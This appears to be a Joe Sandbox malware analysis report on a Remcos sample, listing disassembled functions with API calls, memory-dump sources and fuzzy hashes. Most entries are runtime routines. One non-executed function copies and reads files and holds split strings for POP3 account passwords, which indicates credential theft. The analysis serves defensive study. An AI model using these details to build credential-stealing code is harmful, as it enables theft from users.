                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 2DE95C45 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,2DE95E85,00000006,FlsSetValue,2DE9E190,FlsSetValue,00000000,00000364,?,2DE95BC8,00000000), ref: 2DE95CA5
                                                                                                                                                                                    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 2DE95CB2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2279764990-0
                                                                                                                                                                                    • Opcode ID: 2cb133467a77b02ea5d0e677f604f2f06840d2b995006cfecfe570fa6499508f
                                                                                                                                                                                    • Instruction ID: 27f011dcac2102cba80203df1d5f23ab0253401a2b57e4d9e908f60b10f74b79
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2cb133467a77b02ea5d0e677f604f2f06840d2b995006cfecfe570fa6499508f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6611EC33A026319FDB129E58D990ADA73F6AB80664B164260FE55FB344DF30EC0386D5
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 2DE94ED7 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 2DE97153: GetEnvironmentStringsW.KERNEL32 ref: 2DE9715C
                                                                                                                                                                                      • Part of subcall function 2DE97153: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 2DE9717F
                                                                                                                                                                                      • Part of subcall function 2DE97153: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 2DE971A5
                                                                                                                                                                                      • Part of subcall function 2DE97153: _free.LIBCMT ref: 2DE971B8
                                                                                                                                                                                      • Part of subcall function 2DE97153: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 2DE971C7
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE94F1D
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE94F24
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 400815659-0
                                                                                                                                                                                    • Opcode ID: 1d4075b578f3e017cecb30a98493cfc604c91106b822df95018d312578a30acf
                                                                                                                                                                                    • Instruction ID: 55b077ddd9d930aa42ff4bb13e1a94e87cc950a773541a5bb7de0466f0cb7559
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d4075b578f3e017cecb30a98493cfc604c91106b822df95018d312578a30acf
                                                                                                                                                                                    • Instruction Fuzzy Hash: 95E02B5390F44292D163637A6C41BDE0B41CFD1275F132306EA30FB1C6ED50C50101AE
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 2DE91EEC Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • dllmain_crt_process_attach.LIBCMT ref: 2DE91F22
                                                                                                                                                                                    • dllmain_crt_process_detach.LIBCMT ref: 2DE91F35
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: dllmain_crt_process_attachdllmain_crt_process_detach
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3750050125-0
                                                                                                                                                                                    • Opcode ID: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                                                                                                                                                                    • Instruction ID: 3609cfe27d01a821db841656693f68cd69fcf1da01700c83c45cc9827deba162
                                                                                                                                                                                    • Opcode Fuzzy Hash: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7FE06D3206F10E9ACB035FB59814AFD36D8FF211C5F418926BA10B5158DF2AC691D121
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 2DE938E8 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 2DE93AF1: try_get_function.LIBVCRUNTIME ref: 2DE93B06
                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 2DE93906
                                                                                                                                                                                    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 2DE93911
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 806969131-0
                                                                                                                                                                                    • Opcode ID: 315196f6c2e48f25a60260357e4c2fc6b475102c8262e13b8114c6aff0e08241
                                                                                                                                                                                    • Instruction ID: 6cf08cbfe7d1cb56cf47a6e82443890f9451d2131aeef296b29f04bcc57ebcd1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 315196f6c2e48f25a60260357e4c2fc6b475102c8262e13b8114c6aff0e08241
                                                                                                                                                                                    • Instruction Fuzzy Hash: 15D022BB80F70228981016FC68A6BE913C29B611B8B600347E2E4FB1CBFF10CA406125
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0333E71C Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • VariantCopy.OLEAUT32 ref: 0333E742
                                                                                                                                                                                      • Part of subcall function 0333E320: VariantClear.OLEAUT32 ref: 0333E334
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.846066599.0000000003331000.00000020.00001000.00020000.00000000.sdmp, Offset: 03331000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_3331000_remcos.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Variant$ClearCopy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 274517740-0
                                                                                                                                                                                    • Opcode ID: 69e81e32868ee6c50d4178b76e1f4519f8d9f02d0c5140677667969ff3194e6a
                                                                                                                                                                                    • Instruction ID: fe35b5e2aa66bda9da6ace780e5935b8fd6a836f7d68fe8dcc563a169339212c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 69e81e32868ee6c50d4178b76e1f4519f8d9f02d0c5140677667969ff3194e6a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E11652AB0476087D720EB29CCC496777EDEF87750714D466F44A8F265DA31DC41C7A1
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 03346D84 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 03346D28: CLSIDFromProgID.OLE32 ref: 03346D5A
                                                                                                                                                                                    • CoCreateInstance.OLE32 ref: 03346DD8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.846066599.0000000003331000.00000020.00001000.00020000.00000000.sdmp, Offset: 03331000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_3331000_remcos.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateFromInstanceProg
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2151042543-0
                                                                                                                                                                                    • Opcode ID: 1bddc1e45267ff7345025e67b7ce8fc335e87b123fff7d37fa9f5ddf66f8c62b
                                                                                                                                                                                    • Instruction ID: 944280e467bdc80c04dc1e92a7e571846639caf065ea303d116a12c12013eef3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1bddc1e45267ff7345025e67b7ce8fc335e87b123fff7d37fa9f5ddf66f8c62b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3701A275A08704AFDB05DFA1EDA39AFBBECEB4BB10F914475F900E2650EA706910C664
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0333E320 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.846066599.0000000003331000.00000020.00001000.00020000.00000000.sdmp, Offset: 03331000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_3331000_remcos.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ClearVariant
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1473721057-0
                                                                                                                                                                                    • Opcode ID: 2efaf58eacee21c98adce66a48e0eb597b1775ee924a9043c4bf4894bd1fc6ad
                                                                                                                                                                                    • Instruction ID: 87f811c3f7b7ac8817305d6a43866ad7e58579dcc823b1fbfbeec36b6516d312
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2efaf58eacee21c98adce66a48e0eb597b1775ee924a9043c4bf4894bd1fc6ad
                                                                                                                                                                                    • Instruction Fuzzy Hash: BCF04F6AB0421086D710EB38CDC4AAD6B9C6F47620B54F465B446AF255CB35CC458363
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 2DE9637B Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 2DE963BC
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                    • Opcode ID: bbfa4c256aca9328cbccd8ef7cb45cba97123ee5dec5516ec3dc73f6405b7504
                                                                                                                                                                                    • Instruction ID: f344bff31c5481ceea2a6c05643c2fc5e85e781fc1f84a3c0a17e1a448081415
                                                                                                                                                                                    • Opcode Fuzzy Hash: bbfa4c256aca9328cbccd8ef7cb45cba97123ee5dec5516ec3dc73f6405b7504
                                                                                                                                                                                    • Instruction Fuzzy Hash: D9F0B4721073F5AAE713DA618C05BEA3B99AFD1B74F01812BEE08B7180CE34E50186A0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 03346D28 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.846066599.0000000003331000.00000020.00001000.00020000.00000000.sdmp, Offset: 03331000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_3331000_remcos.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FromProg
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3303861117-0
                                                                                                                                                                                    • Opcode ID: c6e114ab8fb53bfa656c04dbe8d6b69a931de8add606e7db07c3f5a1a37cf44f
                                                                                                                                                                                    • Instruction ID: f56c1565d7a1dfe7e6edb7efed8845e736ce0f4ad092eaded634138389477caa
                                                                                                                                                                                    • Opcode Fuzzy Hash: c6e114ab8fb53bfa656c04dbe8d6b69a931de8add606e7db07c3f5a1a37cf44f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 99E06575A047047FD701EB76DC9299D76ECDB4B610B624471E800A7511DA756E008665
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                    Function 2DE9173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 2DE91CCA: CopyFileW.KERNEL32(?,?,00000000), ref: 2DE91D1B
                                                                                                                                                                                      • Part of subcall function 2DE91CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 2DE91D37
                                                                                                                                                                                      • Part of subcall function 2DE91CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 2DE91D4B
                                                                                                                                                                                    • _strlen.LIBCMT ref: 2DE91855
                                                                                                                                                                                    • _strlen.LIBCMT ref: 2DE91869
                                                                                                                                                                                    • _strlen.LIBCMT ref: 2DE9188B
                                                                                                                                                                                    • _strlen.LIBCMT ref: 2DE918AE
                                                                                                                                                                                    • _strlen.LIBCMT ref: 2DE918C8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _strlen$File$CopyCreateDelete
                                                                                                                                                                                    • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                                                                                                    • API String ID: 3296212668-3023110444
                                                                                                                                                                                    • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                                                    • Instruction ID: d5ccbbc76f502c336becda55f657209aaac8879d9aac57b6a30bfb47fe8e7509
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                                                    • Instruction Fuzzy Hash: DF61F471D0A218AFEF15CFA4C840BEEB7B9EF15308F504096D608BB251EF745A46CB56
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 2DE919B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _strlen
                                                                                                                                                                                    • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                                                                                                    • API String ID: 4218353326-230879103
                                                                                                                                                                                    • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                                                    • Instruction ID: 0a0c5fe800a11df1676ee8e63a9195182d8f1a75c9e10037c225c84da81d234f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                                                    • Instruction Fuzzy Hash: EF7126B1D062285BDF119BB58884AEF7BFCEF19244F504096D644F7241EE749B8ACBA0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 2DE97CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 2DE97D06
                                                                                                                                                                                      • Part of subcall function 2DE990BA: _free.LIBCMT ref: 2DE990D7
                                                                                                                                                                                      • Part of subcall function 2DE990BA: _free.LIBCMT ref: 2DE990E9
                                                                                                                                                                                      • Part of subcall function 2DE990BA: _free.LIBCMT ref: 2DE990FB
                                                                                                                                                                                      • Part of subcall function 2DE990BA: _free.LIBCMT ref: 2DE9910D
                                                                                                                                                                                      • Part of subcall function 2DE990BA: _free.LIBCMT ref: 2DE9911F
                                                                                                                                                                                      • Part of subcall function 2DE990BA: _free.LIBCMT ref: 2DE99131
                                                                                                                                                                                      • Part of subcall function 2DE990BA: _free.LIBCMT ref: 2DE99143
                                                                                                                                                                                      • Part of subcall function 2DE990BA: _free.LIBCMT ref: 2DE99155
                                                                                                                                                                                      • Part of subcall function 2DE990BA: _free.LIBCMT ref: 2DE99167
                                                                                                                                                                                      • Part of subcall function 2DE990BA: _free.LIBCMT ref: 2DE99179
                                                                                                                                                                                      • Part of subcall function 2DE990BA: _free.LIBCMT ref: 2DE9918B
                                                                                                                                                                                      • Part of subcall function 2DE990BA: _free.LIBCMT ref: 2DE9919D
                                                                                                                                                                                      • Part of subcall function 2DE990BA: _free.LIBCMT ref: 2DE991AF
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE97CFB
                                                                                                                                                                                      • Part of subcall function 2DE9571E: HeapFree.KERNEL32(00000000,00000000), ref: 2DE95734
                                                                                                                                                                                      • Part of subcall function 2DE9571E: GetLastError.KERNEL32(?,?,2DE9924F,?,00000000,?,00000000,?,2DE99276,?,00000007,?,?,2DE97E5A,?,?), ref: 2DE95746
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE97D1D
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE97D32
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE97D3D
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE97D5F
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE97D72
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE97D80
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE97D8B
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE97DC3
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE97DCA
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE97DE7
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE97DFF
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 161543041-0
                                                                                                                                                                                    • Opcode ID: 455bc62233ebe990f645de21703d0427af4f0bc45389c99413fb892fc9aed4d9
                                                                                                                                                                                    • Instruction ID: e0cf5a04f6481804f5192d2fc7a61a4ea23c4f7b09e1bc90af9a429e0aaa3b1e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 455bc62233ebe990f645de21703d0427af4f0bc45389c99413fb892fc9aed4d9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A31613150A305DFDB11AB78D941BF677E9FF01254F114859E949F7151DF31AA88C720
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 2DE959D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE959EA
                                                                                                                                                                                      • Part of subcall function 2DE9571E: HeapFree.KERNEL32(00000000,00000000), ref: 2DE95734
                                                                                                                                                                                      • Part of subcall function 2DE9571E: GetLastError.KERNEL32(?,?,2DE9924F,?,00000000,?,00000000,?,2DE99276,?,00000007,?,?,2DE97E5A,?,?), ref: 2DE95746
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE959F6
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE95A01
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE95A0C
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE95A17
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE95A22
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE95A2D
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE95A38
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE95A43
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE95A51
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                    • Opcode ID: f7df89d3cf686c9b9687925fa5c8746204c66439c222444c49d3b7e669f7a313
                                                                                                                                                                                    • Instruction ID: 07dc65309fb13190023e4332a09086aaa11863d5996f22bc316257d31d0597ae
                                                                                                                                                                                    • Opcode Fuzzy Hash: f7df89d3cf686c9b9687925fa5c8746204c66439c222444c49d3b7e669f7a313
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B11A27A52A148EFCB11DF94C841CDD3FA9EF14250F5640A1BA08AB221DE32EB509B90
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 2DE9AA53 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DecodePointer
                                                                                                                                                                                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                                    • API String ID: 3527080286-3064271455
                                                                                                                                                                                    • Opcode ID: c938c916f11f3bf538f8b7b47ed85d320a2a97c39cc736568089880a73232dad
                                                                                                                                                                                    • Instruction ID: ea1251fc020d051d4711614bcdf203d58048f0539a6d90d4f4b619066952e2bc
                                                                                                                                                                                    • Opcode Fuzzy Hash: c938c916f11f3bf538f8b7b47ed85d320a2a97c39cc736568089880a73232dad
                                                                                                                                                                                    • Instruction Fuzzy Hash: 225181B190A60ACBCF01DFA4D9885ECBFB1FF59358F108285E581BB254DF358A25CB19
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 2DE91CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CopyFileW.KERNEL32(?,?,00000000), ref: 2DE91D1B
                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 2DE91D37
                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 2DE91D4B
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 2DE91D58
                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 2DE91D72
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 2DE91D7D
                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 2DE91D8A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1454806937-0
